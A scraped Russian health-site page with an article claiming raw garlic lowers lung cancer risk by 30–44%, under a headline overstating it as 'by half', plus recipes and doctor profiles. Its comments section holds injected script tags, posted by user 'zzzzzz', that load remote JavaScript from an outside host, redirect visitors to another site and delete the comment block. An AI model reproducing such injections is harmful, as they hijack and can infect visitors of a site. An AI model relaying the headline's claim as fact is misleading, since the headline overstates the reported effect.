Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Этот овощ снижает риск ра...  >>  Этот овощ снижает риск рака наполовину!
 
Обратная связь
 

Этот овощ снижает риск рака наполовину!

Размер шрифта
03 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Виктория Ткаченко
Здоровье инфо
  • google_analytics: false
  • Нравится

Опубликованы новые ошеломляющие результаты исследований ученых. Оказывается, чеснок обладает уникальными свойствами. Он может помочь снизить риск рака на 30 – 44%, даже у курильщиков.

Этот овощ снижает риск рака наполовину!

Ученые изучали почти 6 000 человек с 2003 до 2013 года и обнаружили, что употребление в пищу сырого чеснока два раза в неделю может сократить риск развития рака легких на 44% у некурящих и на 30% у курильщиков. Учитывая тот факт, что курение является главной причиной рака легких, это исследования дает огромные надежды.

Снижение риска рака было обнаружено даже у тех людей, которые  подвержены воздействию нагретых паров масел, которые тоже являются канцерогенными. Это тоже указывает на защитный эффект от употребления сырого чеснока.

Главным веществом, ответственным за противораковый эффект, является аллицин, который выделяется, когда зубчик чеснока измельчают, и он реагирует с воздухом. Пока что не известно обладает ли такими же противораковыми свойствами приготовленный чеснок. Ученые, проводившие исследования, говорят о том, что чеснок и вещества из чеснока могут стать профилактическими средствами в борьбе с раком легких.

Как же есть больше чеснока?

Приготовьте соус сальса из нарезанных помидор и перца. Добавьте немного измельченного лука, морской соли и сока лайма. Последний штрих, конечно же, сырой чеснок!

Другой вариант: тушеные или запеченные овощи. Бросьте зубчик сырого чеснока в блендер, добавьте один стакан оливкового масла и 1/3 стакана яблочного уксуса и горчицу. Получается  простой, вкусный и полезный вид заправки для салатов.

Добавляйте чеснок всегда и везде! А чтобы изо рта не пахло – запивайте молоком! Жир в молоке нейтрализует пахучие вещества чеснока.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чеснок спасет вас от рака легких   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Еда против рака. Часть 1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.